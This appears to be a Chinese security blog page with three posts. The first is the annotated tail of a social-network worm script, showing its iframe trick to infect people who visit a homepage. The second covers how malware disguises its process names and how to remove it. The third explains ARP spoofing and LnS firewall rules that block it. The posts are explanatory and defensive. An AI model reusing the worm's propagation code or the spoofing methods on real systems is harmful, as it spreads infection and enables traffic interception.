     //下面跳到开头的processReqChange函数
     }
     }
     else if("xiaonei.com"==document.domain || "www.xiaonei.com"==document.domain)
     {
     //如果不在blog.xiaonei.com域就写入一个Iframe Iframe的SRC是日志的URL
     //这个URL是blog.xiaonei.com域的,就变向的实现了跨域,
     //作者这样做应该是为了一访问别人的主页就能感染
     var url="";
     
     url=document.location.toString();
     if(url.indexOf("&")==-1)
     return;
     step="WriteIframe";
     loadUrl(url,"GET","");
     }
     }

     Start();

  • » 阅读全文...
    • Tags: ,.
    2007年10月15日

    不要让病毒迷惑了您的眼睛

    伴随着反病毒技术的不断进步,病毒技术同样也在丰富自己的手段,如何去发现这些元凶呢?希望通过笔者的介绍,可以给用户一些帮助……

     

          说到病毒,相信遭受过病毒侵袭的用户都会感到无奈。如今伴随着反病毒技术的不断进步,病毒技术同样也在丰富自己的手段。相信用户肯定遇到过这样的情况,重新启动机器就发现杀毒软件都失效了;发现有陌生的进程,却怎么都关不掉;甚至有的用户一有异常就认为是病毒中招,可怎么查都找不到“元凶”。这到底是怎么回事呢?让我们一起来认识如今的计算机病毒。
      欺骗你的眼睛
      说到病毒就需要讲一下,病毒是如何隐藏自己的。任何病毒和木马存在于系统中,都无法彻底和进程脱离关系(一个进程可以笼统的认为是一个正在执行的程序),即使采用隐藏    技术,仍然可以从进程中找到其踪迹,因此查看系统中活动的进程成为我们检测病毒木马最直接的方法。认识并区分进程也成为我们不得不认真对待的事情。
      当用户意识到机器中病毒后,我们通过“任务管理器”查看系统中的进程时,并没有发现异常的进程,这说明病毒采用了隐藏措施。病毒是如何欺骗你的眼睛呢?
      有过计算机使用经验的人应该知道,在系统中存在几个经常被病毒所利用来伪装自己的进程:svchost.exe、explorer.exe、iexplore.exe等,被伪装后的恶意进程呈现如下摸样:svch0st.exe、explore.exe、iexplorer.exe等。粗心的用户可能会被貌似一样的名称所迷惑,但是仔细对比,就发现了其中的七窍。通常此类病毒是将进程名的o改为0,l改为i,i改为j,以求迷惑用户。
      另外还有一个经常被利用的进程svchost.exe,它是一个属于微软Windows操作系统的系统程序,用于执行DLL文件。在基于nt内核的windows操作系统家族中,不同版本的windows系统,存在不同数量的“svchost”进程,病毒正是利用这点。正常的svchost文件存在于“c:\windows\system32”目录下,如果发现该文件出现在其他目录下就要小心了。
      毒种类很多,可以使用的    技术也有很多,这里笔者建议用户使用第三方进程查看工具来查看您系统中到底运行了那些程序。还是用svchost.exe做例子,在XP中点击“开始”/“运行”,输入“services.msc”命令,弹出服务对话框,然后打开“remoteprocedurecall”属性对话框,可以看到rpcss服务的可执行文件的路径为“c:\windows\system32\svchost-krpcss”,这说明rpcss服务是依靠svchost调用“rpcss”参数来实现的,而参数的内容则是存放在系统注册表中的。
      在运行对话框中输入“regedit.exe”后回车,打开注册表编辑器,找到[hkey_local_machine\system\currentcontrol\setservices\rpcss]项,找到类型为“reg_expand_sz”的键“magepath”,其键值为“%systemroot%system32svchost-krpcss”(这就是在    服务窗口中看到的服务启动命令),另外在“parameters”子项中有个名为“servicedll”的键,其值为“%systemroot%system32rpcss.dll”,其中“rpcss.dll”就是rpcss服务要使用的动态链接库文件。这样svchost进程通过读取“rpcss”服务注册表信息,就能启动该服务了。
      其实只要用户稍加留意,用户就可以自行发现系统中存在的大部分恶意程序。下面笔者介绍几种常用的杀毒方式:
      安全模式或DOS模式清除病毒
      当计算机感染病毒的时候,绝大多数的感染病毒的处理可以在正常模式下彻底清除病毒。但计算机病毒是不甘于被杀毒软件轻易发现的,这就需要在计算机安全模式下进行病毒的清除。在安全模式下对于现在大多数流行的病毒,都可以进行比较彻底彻底的清除。但对于一些引导区病毒和感染可执行文件的病毒,需要在纯 DOS下杀毒,如今大部分的杀毒软件都已经提供了引导杀毒,用户可以通过安装盘进行引导区杀毒。
      Outlook邮件病毒的清除
      基本上主流的防毒软件都可以查邮件是否带毒,并可以根据用户的设置进行相应的处理,但在Outlook中,易出现杀毒后的邮箱依旧可以检测到病毒情况,这主要是没有进行空间释放的原因导致的,用户可以进行如下操作:
      选择“工具” — “选项” — “维护” — “立即清除” — “压缩” — “删除”
      共享目录杀毒
      遇到本地共享的目录中的带毒文件不能清除的情况,建议取消共享,然后针对共享目录进行彻底查杀。对远程的共享目录(包括映射盘)查杀病毒的时候,首先要保证本地计算机的操作系统是干净的,同时对共享目录也有最高的读写权限。
          当然这只是这不是所有的病毒清除办法,不得不承认,随着病毒的发展,如今的病毒,类似这几天很火的“杀软克星”,会通过修改注册表,阻止用户进入安全模式。对于此类病毒,一般用户处理起来会相对比较麻烦,建议用户留意最新的病毒播报,即使预防或使用专杀。另外及时更新用户的系统    漏洞,也是必不可少的,笔者还是那句老话,病毒或者攻击行为的发生,根本还是利用系统的漏洞

  • » 阅读全文...
    • Tags: ,.

    推荐:杜绝Arp欺骗--利用Lns防范Arp欺骗

    为了便于说明,我们先假设一个子网环境:
        网关 : IP = IP-1,  MAC = 11:11:11:11:11:11
        本机 : IP = IP-2,  MAC = 22:22:22:22:22:22
        主机A: IP = IP-A,  MAC = AA:AA:AA:AA:AA:AA
        主机B: IP = IP-B,  MAC = BB:BB:BB:BB:BB:BB
        主机C: IP = IP-C,  MAC = CC:CC:CC:CC:CC:CC

    子网内的任意两台主机(网关也可看作一台主机)要正常通讯,需要互相知道对方的网卡地址MAC。如果一方不知道对方的MAC,就要进行ARP查询。

    ARP 查询过程

        在一个正常的子网内,一次完整的 ARP 查询需要一次查询广播和一次点对点的应答。查询广播中包含了要查询主机的IP,此广播可以被子网内的每一台主机的网卡收到,网卡会检查要查询的IP是否与自己的IP相等,不等则直接丢弃,相等则将此数据包提交给系统内核(一个中断),内核调用网卡驱动解析收到的数据包,然后构建一个应答数据包回送到查询的主机,查询主机收到应答后更新自己的ARP缓存表。

        对应 LnS 的设置,此通讯过程需要两条规则,以本机查询主机B的MAC为例
        ① 22:22:22:22:22:22 => FF:FF:FF:FF:FF:FF   (允许本机广播出站)
        ② 22:22:22:22:22:22 <= BB:BB:BB:BB:BB:BB   (允许主机B应答本机入站)

        规则说明方式:=> 表示传出,<= 表示传入,== 表示双向。
        注意按此设置 LnS 规则时,有方向规定的始终要将源放在左边,目标放在右边,对方向为双向的始终将本机放在左边,远端放在右边。

        只要将此查询过程中的任何一步掐断,则该查询过程就会失败。比如有人找你公司的讨债,总经理秘书可以想各种理由使债主见不到总经理,即使见到了,总经理也可以找财务不在或目前实在没钱为由不付钱,讨债就失败了。这两个方法就好比拦截广播和拦截应答。

        子网内的两台主机要能够完整的通讯(双方都可收发数据)必须互知对方的MAC地址,比如本机要跟主机B完整通讯,还必须让主机B也能查询到自己的 MAC。
        ① 22:22:22:22:22:22 => FF:FF:FF:FF:FF:FF   (允许本机广播出站)
        ② 22:22:22:22:22:22 <= BB:BB:BB:BB:BB:BB   (允许主机B应答本机入站)
        ③ FF:FF:FF:FF:FF:FF <= BB:BB:BB:BB:BB:BB   (允许主机B广播入站)
        ④ 22:22:22:22:22:22 => BB:BB:BB:BB:BB:BB   (允许本机应答主机B出站)

        显然规则②④在LnS中是可以合并的,则两台机器完整通讯只须 3 条规则:
        ① 22:22:22:22:22:22 => FF:FF:FF:FF:FF:FF   (允许本机广播出站)
        ② FF:FF:FF:FF:FF:FF <= BB:BB:BB:BB:BB:BB   (允许主机B广播入站)
        ③ 22:22:22:22:22:22 == BB:BB:BB:BB:BB:BB   (允许本机与主机B相互应答)

    简单的 ARP 欺骗

        前面说了,一次查询过程需要一次广播和一次应答,但 ARP 协议中并不要求广播与应答成对出现,也就是可以没有广播,任何一台主机都可以主动发送应答数据包,如果目标主机没有使用静态MAC,则只要收到应答广播就会更新自己的ARP缓存表。因此,我们可以人为的构建一个错误的应答数据包让目标主机更新自己的ARP缓存。
        比如从本机控制,不让主机A与主机B通讯:
        本机向主机A发送应答数据包,告诉它 IP-B 的 MAC 是 XX:XX:XX:XX:XX:XX
        本机向主机B发送应答数据包,告诉它 IP-A 的 MAC 是 YY:YY:YY:YY:YY:YY
        此时主机A和主机B的 ARP 缓存中关于对方的MAC都错误的,他们互发数据时就会发到一个错误或都根本不存在(取决于伪造的MAC)的网卡,A、B 间的通讯自然失败。(其实只要其中一台的ARP缓存错误,A、B 间的通讯就会表现不正常)
        想想,如果伪造的应答数据包是告诉主机B:IP-1 的 MAC 是 ZZ:ZZ:ZZ:ZZ:ZZ:ZZ 会怎么样?则主机B与网关通讯会不正常,就会表现为断网。如果同时对网关欺骗,告诉它主机B的MAC为一个错误值,且这种欺骗一直持续,则主机B无法上网了。

        大家常说的网络执法官就是利用ARP欺骗来踢人的。执法官运行时首先会大量发送广播,获得所有主机的MAC地址,然后,想欺骗谁,就向谁发送伪造的应答数据包。

        当然,ARP欺骗决不仅止于此,比如还可以使目标主机断线后将自己的MAC伪造成被欺骗主机的MAC达到特殊目的,或者同时欺骗网关与目标主机,但是用自己的MAC代替伪造应答数据包中的随机MAC并开启本机的数据转发功能,插入到网关与目标主机通讯中充当代理,达到监听目标主机的目的。但本文的目是要说明LnS中的ARP规则如何设置,ARP欺骗不是重点。

    ARP 防范

        说到这样,大家肯定已经发现一个问题:欺骗者必须能与被欺骗者通讯,以便发送伪造的应答数据包,否则欺骗过程就不能完成。基于这点,我们可以从几个地方来防止 ARP 欺骗:
        一、不让非信任的主机查询自己的MAC,欺骗者不能与本机通讯,自然无从欺骗了
            可以拦截它的查询广播(要钱的一律不许进门)
            可以拦截本机对它的应答(都来要吧,我就一句话,没钱,死猪不怕开水烫)

        二、使用静态MAC,拒绝更新ARP缓存。
            即使有仿造应答到达本机,但本机不使用该包更新自己的ARP缓存,欺骗失败。  那么为什么使用变种二方法的网友实际中“可行”了?说可行是因为过滤太严格,能防止绝大数大ARP欺骗,加引号是因为可行是暂时的,连续的长时间测试,很可能会断网的。
        这跟具体的网络环境有关系,可能的原因比较多。一种可能的原因是LnS有BUG,过滤起作用在本机与网关建立连接之后,或者使用了静态MAC、指定IP避免DHCP租约失效之类,具体的我也分析不清楚。但从原理上说,这方法是错误的。

    安全是相对的
        防止ARP欺骗最好的办法在网关和各子机上均采用静态MAC绑定。防火墙只能增加安全系数,不能保证绝对完全,一是因为防火墙可能有BUG或者功能本身不完善又或者设置不善,二是现实中的妥协可能存在漏洞。比如本机为了上网信任了网关,同时为了共享信任了主机B,但主机B是没有任何安全防护,攻击者可以从主机B下手,迫使主机B当机后将自己伪造主机B的IP与MAC,获得与本机通讯的能力后再用其它办法攻击,更严重的情况是如果网关本身不安全,那么在本机上如何防护都不能取得较好的效果。

  • » 阅读全文...
    • Tags: ,.